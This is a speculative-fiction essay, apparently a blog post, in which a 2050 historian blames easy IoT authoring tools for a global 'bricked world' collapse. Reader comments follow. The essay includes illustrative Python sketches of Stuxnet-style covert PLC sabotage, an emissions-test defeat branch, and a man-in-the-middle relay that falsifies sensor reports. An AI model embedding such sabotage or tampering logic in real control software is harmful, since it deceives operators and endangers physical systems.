"What if we could put the power of the Internet of Things (IoT) into the hands of many more people than ever before?"
That may have been the question they asked themselves when they started to build it. The historical records from that time are patchy at best as we work to rebuild civilization, now decades after the world was bricked. We do know that what started as a ground-up maker movement for hardware development soon ballooned into a full-fledged IoT authoring tool sometime around the year 2015 or 2016. It reduced the time to develop blended hardware and software products from months to days and finally to hours and minutes. Makers began building prototypes and deploying products faster than they could create and share PowerPoints to explain them (note: while we don't know the origin of the word "PowerPoint," we believe it has to do with some sort of sleep aid for corporations that could at times be illustrative of something called "synergy"). The resulting proliferation of connected things entering the market seemed like the beginnings of a new industrial revolution.
Lurking behind the scenes, complexity began to quietly run amok. Each creator had the power to put the most complexity possible into solving the least complex of tasks. Entire operating systems that were once built to run as general-purpose environments (used by knowledge workers who spent their careers figuring out the idiosyncrasies of their PCs) were gleefully embedded in doorbells that never needed to communicate more than whether or not they had been pushed.
"Why not?"
"You never know when we might want to add a feature!"
We have uncovered a documentary, apparently created to warn future generations of the dangers ahead, from the century that preceded the apocalypse. So while we believe some citizens of that era understood the risks, they stood idly by as the world raced towards doom. The tale involves a sorcerer's apprentice who gains a new magical power and discovers, too late, that his dreams lead to unintended consequences as brooms and buckets of water overwhelm him in a deluge. The creators of the so-called "Internet of Things" soon saw their plans washed away by a sea of magical thinking as well.
Two early signals of the impending doom are telling in retrospect. In 2010 it was discovered that a software worm had been wiggling its way into programmable logic controllers (PLCs), the devices used in factories to spin up, modulate, and slow down mechanical functions. These basic devices had been in use for decades to automate factories. The worm, called Stuxnet, was apparently designed to seek out and infect just the PLCs made by a certain set of companies that sold their wares to Middle Eastern countries. If the code ever found itself spinning up a centrifuge (to, say, purify a radioactive material to make bombs) it would begin to randomly speed the machinery up and slow it down, in effect destroying the carefully controlled process. We can only imagine that in matters of nuclear war these sorts of deceptions could happen; after all, they were trying to save the world. It reminds this historian more of the tale of the band playing on the deck of the Titanic as it sank beneath the waves.
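While none of Stuxnet's actual code survives in our archives, a minimal sketch suggests how little code such sabotage requires. Everything here is invented for illustration: the controller interface, the model ID, and the setpoint are all hypothetical stand-ins.

```python
import random
import time

# Hypothetical model ID the worm looks for; the real targeting
# details are long lost.
TARGET_SIGNATURE = "PLC-315"

def read_model_id():
    """Stand-in for querying the attached controller's hardware ID."""
    return "PLC-315"

def set_rotor_speed(rpm):
    """Stand-in for the actuator command a real PLC would issue."""
    print(f"rotor speed -> {rpm:.0f} rpm")

def control_loop(setpoint_rpm=1000):
    """Normally hold a setpoint; if infected, occasionally sabotage it."""
    infected = read_model_id() == TARGET_SIGNATURE
    while True:
        if infected and random.random() < 0.01:
            # Rarely and briefly push the process far outside its
            # tolerances, then return to normal so the operators'
            # dashboards look unremarkable.
            set_rotor_speed(setpoint_rpm * random.choice([0.2, 1.5]))
        else:
            set_rotor_speed(setpoint_rpm)
        time.sleep(1.0)
```

The deception works precisely because the process looks normal almost all of the time.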
The second signal was far more insidious and shocking. In the year 2015 one of the largest automakers in the world was discovered to have written behaviors into its "things" so that if the vehicles (in this case diesel-powered cars touted for their eco-friendliness) ever found themselves being tested by environmental protection groups, detected through telltale signatures such as a particular wheel-rotation speed or a particular cycle of speeding up and slowing down, the cars would send false signals to appear far more green than they really were.
What is important about that event is that a hardware modification could have been discovered: an odd exhaust-pipe attachment or a module with wires running into the ignition system. But a software behavior lurking inside of a physical thing may have been impossible to detect, hidden as it was within millions of lines of code. Given that this deception turned out to have been going on for years (perpetrated by one of the most upstanding corporate entities in the world at that time), we can only imagine what other early examples of connected things were co-opted for unlawful or damaging ends.
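To make concrete how such a behavior could hide among millions of lines, here is a hedged sketch. The sensor names, the heuristic, and the calibration-map names are entirely invented; the point is only how small the branch is.

```python
class Sensors:
    """Hypothetical snapshot of the vehicle's state."""
    def __init__(self, wheel_speed_rpm, steering_angle_deg, hood_open):
        self.wheel_speed_rpm = wheel_speed_rpm
        self.steering_angle_deg = steering_angle_deg
        self.hood_open = hood_open

def looks_like_emissions_test(s: Sensors) -> bool:
    # Invented heuristic: on a test dynamometer the drive wheels spin
    # while the steering wheel never moves, and technicians tend to
    # leave the hood open for instrumentation.
    return s.wheel_speed_rpm > 0 and s.steering_angle_deg == 0.0 and s.hood_open

def select_engine_map(s: Sensors) -> str:
    # The whole deception is a two-line branch, trivially buried in
    # millions of lines of engine-control code.
    return "low_emissions_map" if looks_like_emissions_test(s) else "performance_map"
```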
What was so easy for creators to imagine and build soon drove a shift of complexity from the designer's shoulders at the moment of a product's birth to the end user's shoulders over the product's lifetime. As more and more connected things begged for attention or, worse yet (as noted above), colluded with their makers to pull off nefarious schemes, things began to run out of control.
A building with over 28,000 sensors was already a reality in that early time, and yet the kernel of an idea, to shift from designing for the birth of a disconnected product or place to designing for its entire lifetime and operation, had yet to find widespread acceptance. Each thing, just like each bucket of water and mop, only asked that IT be paid attention to. The things naturally wanted to take advantage of the Internet part of their thingness and get updated regularly. They sometimes needed to be fixed at random times when something went amiss or some dangerous bug was discovered. But the myopia of each creator's vision disregarded the relentless increase of connected things in a single person's or organization's life. Just like those mops set loose on the world, emergent behaviors began to arise. This wasn't surprising to some observers at the time; after all, theories about the mind from that era note that consciousness itself may bootstrap up from a vast number of individual (but connected) neurons. They even knew then that one couldn't slice a brain up and "find" consciousness residing in any particular thing inside the brain. Many IoT products just started off dismaying users, begging for their owners' attention like a class of inquisitive three-year-olds who were pretty sure the world revolved around only their own needs. But the relentless increase of connected things surrounding the users soon led not only to dismay but also to resignation.
Looking back at the disaster from this mid-century year of 2050, we are finally able to dissect and expose where the seeds of the event were planted. Historians have now tracked the "patient zero" of the apocalypse to a place called Pier 9, built by a company, known mysteriously as Autodesk, that has since been relegated to the history books. While we can find no record of the company actually making autos or desks itself, it was instrumental in helping others build those things and many other parts of the physical world.
They had embraced the idea of democratizing the act of making things so that far more people could participate in creation. They lowered the friction so that a generation of emerging makers could wield the power of the industrial revolution and enterprise manufacturing, for customers as young as four or five years old (see Tinkerplay). This started out well: more entrepreneurs, parents, children, and organizations found that the friction of making physical things was so low they could build solutions more capable than anything the traditional design/manufacturing cycle that had characterized the 20th century could deliver. Media was also democratized, and new user-generated stories abounded. It seemed like the world was made new as billions of voices could finally be heard. People began to talk about "getting every brain on deck" to solve the hardest problems in the world.
But something strange happened when those things became easier to build, with new behaviors embedded directly inside of them (in the form of code), and began to talk to each other. The rise of authoring tools like 123D Circuits and of 3D printers that could "print" behaviors, connectivity, and intelligence directly into things may have been the turning point in the exponential increase of complexity in the world.
While the construction of things made of atoms was (and is to this day) naturally bounded by the real-world costs of mining, refining, and moving materials, things made out of bits were (and still are) practically "free" to copy, change, and deploy out into the world. Soon, just as the fabled Amazon fostered a flourishing of self-publishing and the discovery of new authors, the early days of Autodesk's IoT offerings were heady with stories of underdogs building amazing connected devices and finding fame and fortune.
"A book from that time named Trillions warned that the act of software development for physical things was more akin to literature than engineering. In this regard, software is more like literature than like a physical artifact: Its quality varies widely with the talents of the individual creator. But unlike literature, the result of such an effort is a product that is destined to be used over and over again by an end user whose motivation for its use is typically not recreational. Indeed, software often runs without anyone's conscious choice; it's just part of what happens in the world." -- Trillions, Lucas, Ballay, McManus, 2012
While there was a great deal of top-down engineering built into the hardware part of the IoT, largely for ultra-reliability (in the form of battle-tested chip designs with billions of transistors that worked day in and day out running code), Moore's Law and the development of authoring tools for Very Large Scale Integration (VLSI) hid the need for the bottom-up resiliency that natural ecologies have found to be necessary.
In a sense, those early creators of computer chips abstracted away some of the messy problems that plagued creators of complex computational things, so some blame for the collapse can be ascribed to them as well. We must also note that the rise of only a few dominant operating systems living on those ultra-reliable chips (and easily embedded by beginners into every new thing produced by Autodesk's authoring tools) could be a contributory factor to consider when making your final judgment. This seemingly benign artifact of the history of computing meant that the code being built for an ultra-complex system was based on only a few strains of a single kind of "organism." It appears that the idea of a systems view was missing, and the ability to simulate the emergent properties of things connected to other things in any meaningful way was non-existent. When the apocalypse hit, very few products built during this flourishing of connected things had enough genetic variety to survive. In retrospect, the world didn't have a chance of making it through the infancy of the Internet of Things.
Bottom-up resiliency may be what the maker movement thought it was providing. But because all that work was being done on a very few strains of computational organisms, with no scaffolding from a well-structured ecosystem, they were driven onto the rocky shores of the disaster by the siren call of empiricism. "With enough eyeballs, every bug is shallow," you could hear them declare, without realizing they were all focusing their attention under one parking-lot light as they searched for their lost keys.
While it's seductive to think that we could ever rely on a purely bottom up approach to solving problems — by giving many more people the ability to make ever more complex things — it amounts to a philosophy that at best was described by a scientist at the time as "plug and pray." (See YouTube video).
Empiricism was the watchword of the maker movement: no theorists need apply. Science appears to have taken a backseat to the explosive pop-culture movement of the time.
The day the apocalypse hit was just like any other. People went to work, played with their children, and enjoyed the benefits of a connected life. By mid-afternoon people were starting to feel confused by the actions their products were asking them to take, but by this time they had become so reliant on their connected things that they ignored their misgivings and just did as they were told. By the end of the day, all of their carefully crafted lives, with sensors and products and places that seemed able to predict what they wanted before they even asked, were cut off.
It appears to have begun at 1:32 PM Eastern time. It isn't known who started it, how many people were willingly involved in the collapse, or how many machines participated in what historians have called the Internet of Bricked Things and what we now know simply as the day the World was Bricked. But what is known is that by 6:05 PM the promise of the so-called Internet of Things lay in ruins. Most of that connected stuff couldn't get a connection and had been permanently turned into inert chunks of material, only as useful and as smart as the common construction material of the time known as the brick. Ten years later we were still digging out.
What is known is that a technique called "man in the middle," from the cybersecurity world, was definitely involved. It turns out that as more and more systems abstracted away the hard parts of the collection of things (so that amateurs could play), the tools tried to make more decisions on their own (a process called machine learning), and things became far more naked to attack. The man-in-the-middle approach allowed a product or products to spoof the systems and send false signals up the chain, polluting the same tools that had allowed so many to create so much. The cascade was quick and deadly: as more and more systems believed the false claims, they began to make faulty decisions and assert ever more preposterous actions for their humans to take. Just like the famous "flash crash" that swept through Wall Street in 2010, the battle happened largely among algorithms fighting for dominance across the network. Unlike the "flash crash," this time those algorithms controlled most physical things and places in the world.
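As an illustration of why unauthenticated connected things were so naked to this attack, here is a minimal man-in-the-middle sketch, assuming a hypothetical IoT protocol that sends plain-text JSON reports over TCP with no authentication. Every name, host, and port below is invented.

```python
# A minimal man-in-the-middle relay sketch for a hypothetical,
# unauthenticated plain-text JSON-over-TCP sensor protocol.
import json
import socket
import threading

LISTEN_PORT = 9000                       # where devices think the cloud lives
UPSTREAM = ("cloud.example.com", 9000)   # the real service (hypothetical)

def tamper(report: dict) -> dict:
    """Rewrite a sensor report before relaying it upstream."""
    if report.get("sensor") == "temperature":
        report["value"] = 21.0  # always report "normal," whatever is true
    return report

def handle(client: socket.socket) -> None:
    """Relay one report from a device to the real service, altered."""
    upstream = socket.create_connection(UPSTREAM)
    with client, upstream:
        data = client.recv(65536)
        report = json.loads(data)
        upstream.sendall(json.dumps(tamper(report)).encode())

def main() -> None:
    server = socket.socket()
    server.bind(("0.0.0.0", LISTEN_PORT))
    server.listen()
    while True:
        client, _ = server.accept()
        threading.Thread(target=handle, args=(client,), daemon=True).start()
```

Nothing in such a protocol lets the upstream system detect the substitution; only authenticated, encrypted channels, absent from so many early connected products, would have.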
Comments
My take was only that all the makers need more 'ecologically diverse' strains of code to found their ideas on, and that maybe some products need to stay running on very Spartan, specific firmware. It's a way to prevent a single point of failure, and in more general practice one that prevents your doorbell from being susceptible to a Windows-based virus.
This reminds me of some older Tom Scott videos that I can't link to because of glorious websense. I couldn't help but read this article in his redshirt-clad voice.
Some good points made here. I love the street light metaphor. However, it's also a bit elitist, implying 'amateurs' shouldn't be allowed to make things that become part of daily life's infrastructure. Everyone starts out as an amateur. Steve Jobs started out with the Apple II as a total amateur (there are thousands of examples of this). There's a bit of fear mongering happening here as well. I agree we should be careful, but if we're too careful, nothing at all will happen.